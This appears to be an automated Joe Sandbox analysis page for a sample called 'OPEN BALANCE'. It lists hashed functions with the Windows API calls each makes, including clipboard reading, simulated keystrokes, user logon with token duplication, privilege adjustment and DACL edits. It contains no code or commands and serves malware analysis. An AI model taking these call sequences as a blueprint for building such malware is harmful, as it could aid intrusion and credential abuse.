Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: acdd908676f3e4aa43ee9a106a80f5b4e207ffbe05312586337a0f2989bc7750
Instruction ID: 572ee9c3eeb6647ef6a1e217a9c6d0712e406878e646f0d37eef475fdefe08a1
Opcode Fuzzy Hash: acdd908676f3e4aa43ee9a106a80f5b4e207ffbe05312586337a0f2989bc7750
Instruction Fuzzy Hash: CEC09236398305AFF7149B80BC8AF907B65F348B00F04C202F709A95E3C7B22820FA50

Function 0085FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0085FD1F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 68e6330246e80247a856520eb6deddaf4ada577e79af6ad6793a993755f21c64
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 4531E074A001099BCB18CF59D480969FBB6FF49306B6486B5E909CF656D731EEC5CBC0

Function 014E22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 014E22B1

Memory Dump Source

Source File: 00000000.00000002.2061131437.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_OPEN BALANCE.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 89b6514cd1009d50ee1e70cd8e00912fda9081e71532aa5704c2f838889830c5
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 00E0BF7494010E9FDB00EFA4D6496AE7BB4EF04302F1001A1FD0192281D67099508A62

Non-executed Functions

Function 008D9576 Relevance: 67.1, APIs: 36, Strings: 2, Instructions: 625windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 008D961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008D965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 008D969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008D96C9
SendMessageW.USER32 ref: 008D96F2
GetKeyState.USER32(00000011), ref: 008D978B
GetKeyState.USER32(00000009), ref: 008D9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008D97AE
GetKeyState.USER32(00000010), ref: 008D97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008D97E9
SendMessageW.USER32 ref: 008D9810
SendMessageW.USER32(?,00001030,?,008D7E95), ref: 008D9918
SetCapture.USER32(?), ref: 008D994A
ClientToScreen.USER32(?,?), ref: 008D99AF
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008D99D6
ReleaseCapture.USER32 ref: 008D99E1
GetCursorPos.USER32(?), ref: 008D9A19
ScreenToClient.USER32(?,?), ref: 008D9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 008D9A80
SendMessageW.USER32 ref: 008D9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 008D9AEB
SendMessageW.USER32 ref: 008D9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 008D9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 008D9B4A
GetCursorPos.USER32(?), ref: 008D9B68
ScreenToClient.USER32(?,?), ref: 008D9B75
GetParent.USER32(?), ref: 008D9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 008D9BFA
SendMessageW.USER32 ref: 008D9C2B
ClientToScreen.USER32(?,?), ref: 008D9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 008D9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 008D9CDE
SendMessageW.USER32 ref: 008D9D01
ClientToScreen.USER32(?,?), ref: 008D9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 008D9D82

Part of subcall function 00859944: GetWindowLongW.USER32(?,000000EB), ref: 00859952

GetWindowLongW.USER32(?,000000F0), ref: 008D9E05

Strings

F, xrefs: 008D9D07
@GUI_DRAGID, xrefs: 008D997D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease
String ID: @GUI_DRAGID$F
API String ID: 1312020300-4164748364
Opcode ID: 9965b9bb24625a98dcca1737302325870649f2746d302776b3ba8945bbafd893
Instruction ID: 2ff53417ccf3a131e12a093b8b48769510c2cb1753bcec06e24a4dda958b177f
Opcode Fuzzy Hash: 9965b9bb24625a98dcca1737302325870649f2746d302776b3ba8945bbafd893
Instruction Fuzzy Hash: 97427934205201AFDB24CF68DC44AAABBE5FF58324F14471AF699D73A1E731E850DB52

Function 008D4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 008D48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 008D4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 008D4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 008D494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 008D495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 008D497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 008D49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 008D49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 008D4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 008D4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 008D4A7E
IsMenu.USER32(?), ref: 008D4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008D4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008D4B20
GetWindowLongW.USER32(?,000000F0), ref: 008D4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 008D4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 008D4C82
wsprintfW.USER32 ref: 008D4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008D4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 008D4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008D4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008D4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 008D4D5A

Strings

%d/%02d/%02d, xrefs: 008D4CA8

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 7877882700c6a895e8dcc288ba7af66e5c99460599aa81d1a744cb78b36a6d9a
Instruction ID: 3ff3969f708cbf9ec2e71ceb962fcabbc2bc08e9d0db751067ee4e8faa6cf884
Opcode Fuzzy Hash: 7877882700c6a895e8dcc288ba7af66e5c99460599aa81d1a744cb78b36a6d9a
Instruction Fuzzy Hash: E012ED71600219ABEB248F28DC49FAE7BF8FF45714F10522AF916EB2E1DB749941CB50

Function 0085F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0085F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0089F474
IsIconic.USER32(00000000), ref: 0089F47D
ShowWindow.USER32(00000000,00000009), ref: 0089F48A
SetForegroundWindow.USER32(00000000), ref: 0089F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0089F4AA
GetCurrentThreadId.KERNEL32 ref: 0089F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0089F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0089F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0089F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0089F4DE
SetForegroundWindow.USER32(00000000), ref: 0089F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0089F4F6
keybd_event.USER32(00000012,00000000), ref: 0089F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0089F50B
keybd_event.USER32(00000012,00000000), ref: 0089F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0089F519
keybd_event.USER32(00000012,00000000), ref: 0089F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0089F528
keybd_event.USER32(00000012,00000000), ref: 0089F52D
SetForegroundWindow.USER32(00000000), ref: 0089F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0089F557

Strings

Shell_TrayWnd, xrefs: 0089F46F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: b37660af08588ee87a88f96dcc4a38769e994046521135cb760a9c772f9dba67
Instruction ID: 952edf362e957c415091ebf3ae05cc8ba4ee78952d974b57bc9df44c3d8f7db4
Opcode Fuzzy Hash: b37660af08588ee87a88f96dcc4a38769e994046521135cb760a9c772f9dba67
Instruction Fuzzy Hash: 14315E71A41219BAEF206BB55C4AFBF7F6CFB44B50F15016AFA01E61D1C6B09900EA60

Function 008A1201 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 008A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008A170D
Part of subcall function 008A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008A173A
Part of subcall function 008A16C3: GetLastError.KERNEL32 ref: 008A174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 008A1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 008A12A8
CloseHandle.KERNEL32(?), ref: 008A12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008A12D1
GetProcessWindowStation.USER32 ref: 008A12EA
SetProcessWindowStation.USER32(00000000), ref: 008A12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008A1310

Part of subcall function 008A10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008A11FC), ref: 008A10D4
Part of subcall function 008A10BF: CloseHandle.KERNEL32(?,?,008A11FC), ref: 008A10E9

Strings

default, xrefs: 008A130B
winsta0, xrefs: 008A12CC
, xrefs: 008A125A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: f607adc4bf33945e6ff670fdbc98ad21638c929bb8e90411f9d8a6f8742f337a
Instruction ID: 0b971374a9a706fd4da53f1d9ce73a846e322c61941cdae275d55ed55eaff1ca
Opcode Fuzzy Hash: f607adc4bf33945e6ff670fdbc98ad21638c929bb8e90411f9d8a6f8742f337a
Instruction Fuzzy Hash: FC81A071901209AFEF219FA8DC49FEE7BBAFF09704F14422AF911E65A0D7358944CB25

Function 008A0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008A1114
Part of subcall function 008A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,008A0B9B,?,?,?), ref: 008A1120
Part of subcall function 008A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008A0B9B,?,?,?), ref: 008A112F
Part of subcall function 008A10F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008A1136
Part of subcall function 008A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008A114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008A0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008A0C00
GetLengthSid.ADVAPI32(?), ref: 008A0C17
GetAce.ADVAPI32(?,00000000,?), ref: 008A0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008A0C6D
GetLengthSid.ADVAPI32(?), ref: 008A0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 008A0C8C
RtlAllocateHeap.NTDLL(00000000), ref: 008A0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 008A0CB4
CopySid.ADVAPI32(00000000), ref: 008A0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008A0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008A0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 008A0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008A0D45
HeapFree.KERNEL32(00000000), ref: 008A0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008A0D55
HeapFree.KERNEL32(00000000), ref: 008A0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008A0D65
HeapFree.KERNEL32(00000000), ref: 008A0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 008A0D78
HeapFree.KERNEL32(00000000), ref: 008A0D7F

Part of subcall function 008A1193: GetProcessHeap.KERNEL32(00000008,008A0BB1,?,00000000,?,008A0BB1,?), ref: 008A11A1
Part of subcall function 008A1193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008A11A8
Part of subcall function 008A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,008A0BB1,?), ref: 008A11B7

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4042927181-0
Opcode ID: ceac35541474ced1f223f4325d840b7365cf2c5807ffd4f21ed4d4d53a7cbe9f
Instruction ID: 8a823785e81e775115e30a413895c6ecca2897ec4ee1aad85c0f5a948b54324e
Opcode Fuzzy Hash: ceac35541474ced1f223f4325d840b7365cf2c5807ffd4f21ed4d4d53a7cbe9f
Instruction Fuzzy Hash: 31716A7290121AABEF10DFA4DC48BAEBBB8FF05310F044619E914E7291D775A905CFA1

Function 008BEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(008DCC08), ref: 008BEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 008BEB37
GetClipboardData.USER32(0000000D), ref: 008BEB43
CloseClipboard.USER32 ref: 008BEB4F
GlobalFix.KERNEL32(00000000), ref: 008BEB87
CloseClipboard.USER32 ref: 008BEB91
GlobalUnWire.KERNEL32(00000000), ref: 008BEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 008BEBC9
GetClipboardData.USER32(00000001), ref: 008BEBD1
GlobalFix.KERNEL32(00000000), ref: 008BEBE2
GlobalUnWire.KERNEL32(00000000), ref: 008BEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 008BEC38
GetClipboardData.USER32(0000000F), ref: 008BEC44
GlobalFix.KERNEL32(00000000), ref: 008BEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 008BEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 008BEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 008BECD2
GlobalUnWire.KERNEL32(00000000), ref: 008BECF3
CountClipboardFormats.USER32 ref: 008BED14
CloseClipboard.USER32 ref: 008BED59

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatQueryWire$CountFormatsOpen
String ID:
API String ID: 3738814834-0
Opcode ID: 47b10002bdf8c0fc973ae2d28869b4d2c0e467966feb227ddf7d3fdbc547f08f
Instruction ID: f1c12ec9f89ca37300b5916f59c60e816da41afcf27c97ba3066fdf342159599
Opcode Fuzzy Hash: 47b10002bdf8c0fc973ae2d28869b4d2c0e467966feb227ddf7d3fdbc547f08f
Instruction Fuzzy Hash: BB61AD35205206AFD310EF28D888FAA7BA8FF84714F18461EF456D73A2DB71D905CB62

Function 008D911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

DragQueryPoint.SHELL32(?,?), ref: 008D9147

Part of subcall function 008D7674: ClientToScreen.USER32(?,?), ref: 008D769A
Part of subcall function 008D7674: GetWindowRect.USER32(?,?), ref: 008D7710
Part of subcall function 008D7674: PtInRect.USER32(?,?,008D8B89), ref: 008D7720

SendMessageW.USER32(?,000000B0,?,?), ref: 008D91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008D91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008D91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 008D9225
SendMessageW.USER32(?,000000B0,?,?), ref: 008D923E
SendMessageW.USER32(?,000000B1,?,?), ref: 008D9255
SendMessageW.USER32(?,000000B1,?,?), ref: 008D9277
DragFinish.SHELL32(?), ref: 008D927E
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 008D9371

Strings

@GUI_DROPID, xrefs: 008D929E
@GUI_DRAGFILE, xrefs: 008D9320
@GUI_DRAGID, xrefs: 008D92E9

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 4085959399-3440237614
Opcode ID: f301b845324854cf89882ad031118614bca2860bb7f75db91b71c5a8b0abf15c
Instruction ID: 95ffadc2a4113aab7e94cba615bdc2f433ff87ce49dd6bd403d1fc877288dbd2
Opcode Fuzzy Hash: f301b845324854cf89882ad031118614bca2860bb7f75db91b71c5a8b0abf15c
Instruction Fuzzy Hash: 45616971108305AFC701DF68DC85DAFBBE8FF98750F000A2EF5A5922A1DB709A49CB52

Function 008B698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 008B69BE
FindClose.KERNEL32(00000000), ref: 008B6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008B6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008B6A75

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 008B6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 008B6ADF

Strings

%4d, xrefs: 008B6BB1
%4d%02d%02d%02d%02d%02d, xrefs: 008B6B6A
%02d, xrefs: 008B6C00, 008B6C0A, 008B6C5A, 008B6CAA, 008B6CFA, 008B6D4A
%03d, xrefs: 008B6DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 008B6B32

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 0c8f8fcb472928800371df574db1f7357fc8a4246def3bbf50bd142a167cf19e
Instruction ID: eb26c888aafefbd83700e0ae6b5e7d2a77c2cb57bb514ec77b870c2e23dd9e05
Opcode Fuzzy Hash: 0c8f8fcb472928800371df574db1f7357fc8a4246def3bbf50bd142a167cf19e
Instruction Fuzzy Hash: D4D12E72508304AEC714EBA8C881EAFB7ECFF98704F444919F585D6291EB74DA48CB63

Function 008B9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 008B9663
GetFileAttributesW.KERNEL32(?), ref: 008B96A1
SetFileAttributesW.KERNEL32(?,?), ref: 008B96BB
FindNextFileW.KERNEL32(00000000,?), ref: 008B96D3
FindClose.KERNEL32(00000000), ref: 008B96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 008B96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 008B974A
SetCurrentDirectoryW.KERNEL32(00906B7C), ref: 008B9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 008B9772
FindClose.KERNEL32(00000000), ref: 008B977F
FindClose.KERNEL32(00000000), ref: 008B978F

Strings

*.*, xrefs: 008B96F5

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
